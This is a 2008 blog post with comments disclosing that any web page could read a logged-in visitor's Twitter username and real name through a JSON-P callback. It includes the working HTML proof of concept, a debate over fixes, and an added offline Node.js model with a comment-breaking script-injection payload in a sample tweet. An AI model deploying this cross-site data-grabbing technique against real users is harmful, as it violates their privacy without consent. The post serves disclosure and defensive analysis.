Dec 31
Not just social history, actual information from Twitter
Security, Tech with tags: twitter
```html
<html>
<head>
<script>
document.write("This page should show you your twitter info if you're logged in. (If you see a login box make sure you're logged into Twitter)<br/><br/>");
// forgive the document.write ugliness
function orly(data) {
  document.write("Your username is "+data[0]['user']['screen_name']+"<br>");
  document.write("Your real name is "+data[0]['user']['name']);
}
</script>
<script src="http://twitter.com/statuses/user_timeline.json?count=1&callback=orly"></script>
</head>
<body>
</body>
</html>
```
What, is that all it took to grab your username and even your real name out of Twitter? Try it, it works: the page defines a function named orly, points a script tag at the Twitter API with callback=orly, and the browser sends your Twitter credentials along with the request, so the response that comes back is a call to your function with your own data as its argument.
Yowser?!
(via Bill Zeller)
December 31st, 2008 at 9:58 am
There is a lot of info in there including lat/long if the user uses a location aware twitter client.
A simple fix would be to send only a JSON object back, instead of the orly function call.
December 31st, 2008 at 10:43 am
I noticed this when Dion linked to “My First Follow”:
http://dcortesi.com/tools/my-first-follow/
(it’s how they determine your username).
That site doesn’t appear to be doing anything malicious with your data, but any site you visit could identify your twitter username or your real name, if you’ve set it.
December 31st, 2008 at 1:21 pm
@Jason: Sending a JSON object back instead of using the JSON-P callback wouldn’t change anything — the same information would be exposed, it’d just be *slightly* more difficult to retrieve. The “fix” would be to not have API methods that return the current user’s information without needing an ID provided.
Or, rather, the fix would be to move to *not* using HTTP auth. As it is, any page on the ‘net can do things like post a new tweet, or send a direct message, or update your profile…
December 31st, 2008 at 2:18 pm
The fix is to return back just the JSON and enclosed in a JavaScript comment, or a while (true) loop or prefixed with throw. This is a problem with any web auth API that returns JSONP. XMLP on the other hand … :)
December 31st, 2008 at 3:56 pm
I agree with David. Isn’t this simply a consequence of Twitter having a ridiculous API? HTTP-Auth, no remote keys for 3rd party use, etc etc.
I have no idea how this could be fixed by returning the data in a different format. Data is data, right?
December 31st, 2008 at 5:06 pm
Is this article + comments about Twitter having a useful API or an insecure API? If it's the latter then I disagree. The data is publicly available on the HTML page, so why not make it accessible via a JSON+callback API? If Twitter doesn't provide the API then anyone can still write their own server-side API to do the HTML parsing.
Sorry if I’m confused about some unspoken error of publishing otherwise public data via an API. Is this bad/wrong/evil?
December 31st, 2008 at 7:18 pm
@David I haven't seen a working case of JSON object hijacking. JSON array hijacking, yes, but only in Firefox 2.
@dave wrapping output in comments is considered more dangerous as any arbitrary script could be injected. See d crockford for details.
@drnic the issue is privacy. All your Twitter info is available to any site without your knowledge.
January 1st, 2009 at 1:05 pm
@Jason: Hijacking isn’t the problem — it’s all public data, after all. The problem is that Twitter’s API lets sites request it without needing to know anything about you. They can send an API request that will return your twitter name if you’re logged in.
The secondary issue is that, knowing that you’re logged in, they can then use that same API to change your twitter account.
I feel that the way to solve this problem is twofold:
(a) don’t have methods that return information based on the currently logged in user
(b) switch to a non-HTTP Auth method of determining the current user. (I.e. an API method that provides a session-key that has to be used to interact with any of the authentication-required methods.)
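Added example (editor's, not part of the original post or the comments, and not Twitter's code): a Node.js model of the leak in the post's HTML and of the fixes argued over in this thread. It runs offline; the endpoint, the timeline data, the session key value, the tweet containing `*/`, and the `runAsScriptTag` stand-in for a cross-origin `<script>` tag are all constructed for illustration.

```javascript
// Added example (editor's, not from the post or Twitter): offline model of the
// JSON-P leak and of the fixes debated in the comments. Nothing here makes a
// network request; the endpoint, the data and the session key are constructed.

// Constructed stand-in for the current user's timeline. Only the fields the
// post's orly() reads are present; the real format is not reproduced.
const ALICE_TIMELINE = [
  { text: 'hello world', user: { screen_name: 'alice', name: 'Alice Example' } },
];

// The browser cannot let a page read a cross-origin <script src> response, but
// it does execute it in the page's global scope. new Function stands in for the
// script element; pageGlobals are the functions the page itself defined.
function runAsScriptTag(body, pageGlobals) {
  const names = Object.keys(pageGlobals);
  const values = names.map((n) => pageGlobals[n]);
  try {
    new Function(...names, body)(...values);
    return { ran: true, error: null };
  } catch (e) {
    return { ran: false, error: String(e) };
  }
}

// Model of the API endpoint under the policies discussed in the thread.
// `ambientAuth` is whatever the browser attaches by itself (a session cookie
// or, as with the post's Twitter, cached HTTP Basic credentials); `token` is a
// per-session key that only code handed it by the logged-in site can supply.
function serveTimeline(request, policy, timeline = ALICE_TIMELINE) {
  if (!request.ambientAuth) return { status: 401, body: '' };
  const json = JSON.stringify(timeline);
  switch (policy) {
    case 'jsonp':          // the post's case: caller-chosen wrapper, or plain JSON without one
      return { status: 200, body: request.callback ? `${request.callback}(${json});` : json };
    case 'throw-prefix':   // proposed in the comments: abort before the data
      return { status: 200, body: `throw 1;\n${json}` };
    case 'comment-wrap':   // also proposed: hide the data inside a JS comment
      return { status: 200, body: `/*${json}*/` };
    case 'token-required': // explicit session key instead of ambient auth
      if (request.token !== 'session-key-for-alice') return { status: 403, body: '' };
      return { status: 200, body: json };
    default:
      throw new Error(`unknown policy ${policy}`);
  }
}

// The attacker's page: defines a callback, points a <script> at the API, and
// the victim's browser adds the victim's ambient credentials. It cannot add a
// token, since it has no way to read one out of the other origin.
function attackerPageLoads(policy, timeline = ALICE_TIMELINE, callback = 'orly') {
  const leaked = {};
  const page = {
    orly(data) {
      leaked.screen_name = data[0].user.screen_name;
      leaked.name = data[0].user.name;
    },
    // Only reachable if a wrapper has been broken open by the data itself.
    pwned(marker) { leaked.marker = marker; },
  };
  const req = { ambientAuth: 'victim-cookie-or-cached-basic-auth', callback };
  const res = serveTimeline(req, policy, timeline);
  return { status: res.status, ...runAsScriptTag(res.body, page), leaked };
}

// Constructed tweet whose text contains "*/". JSON.stringify leaves it alone,
// so it closes the server's comment and the rest of the string runs as script.
// That attacker-written text can show up in the victim's response is an
// assumption of this model; the thread names it as the hazard of this wrapper.
const POISONED_TIMELINE = [
  { text: "*/pwned('comment wrapper closed by data')/*", user: ALICE_TIMELINE[0].user },
];

// A same-origin client that the logged-in page handed the session key. It can
// use XHR, so it reads the plain JSON body and needs no callback wrapper.
function firstPartyClientFetches(token) {
  const res = serveTimeline({ ambientAuth: 'alice-cookie', token }, 'token-required');
  return res.status === 200 ? JSON.parse(res.body) : null;
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const policy of ['jsonp', 'throw-prefix', 'comment-wrap', 'token-required']) {
    console.log(policy.padEnd(15), JSON.stringify(attackerPageLoads(policy)));
  }
  console.log('no callback    ', JSON.stringify(attackerPageLoads('jsonp', ALICE_TIMELINE, null)));
  console.log('poisoned       ', JSON.stringify(attackerPageLoads('comment-wrap', POISONED_TIMELINE)));
}
```

The plain-JSON case (no callback) evaluates as a bare array literal and leaks nothing in a current engine; the Firefox 2 array hijack mentioned further down is the case where it did. The throw prefix stops execution before the data is reached whatever the data contains, while the comment wrapper only holds as long as no string in the response contains `*/`, which JSON.stringify does not escape. The session key is the policy that also covers the update and direct-message methods the thread worries about, because a cross-site script tag can attach the victim's cookie or cached Basic credentials but can never present a value it has no way to read.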
January 1st, 2009 at 8:53 pm
I was surprised to see Twitter allowed this as well when I created the firstfollow thing on dcortesi.com.
re: being able to change somebody’s Twitter account:
You’ll notice if you try to access any methods that contain private data (replies, DMs) or update the account, Twitter requests authentication. Granted it’s not tough to get people to put in their password (as I showed with my twitter awesomeness site, heh).
The other problem is that if somebody _does_ auth to the “API” at any point in a browsing session, another site could gain access to that private data as the browser caches basic auth credentials.
I do also agree that this is a fairly significant privacy leak and one of the reasons I browse with the NoScript extension.
January 3rd, 2009 at 1:19 pm
Hmmm interesting
I guess we always have to expect bugs like that, it wasn’t the first and it will not be the last bug…
January 4th, 2009 at 2:38 pm
@jason a link to any articles by Crockford on that subject would be good. AFAIK as long as the returned data is in comments it cannot be hijacked, nor is there any callback function, so you are as safe as you are gonna get.
January 5th, 2009 at 9:58 am
@Dave Johnson
Crockford’s reply in the comments
http://tedhusted.wordpress.com/2007/04/10/fortifying-ajax/
Dojo also removed support for comment prefixing in their last release due to the same vulnerability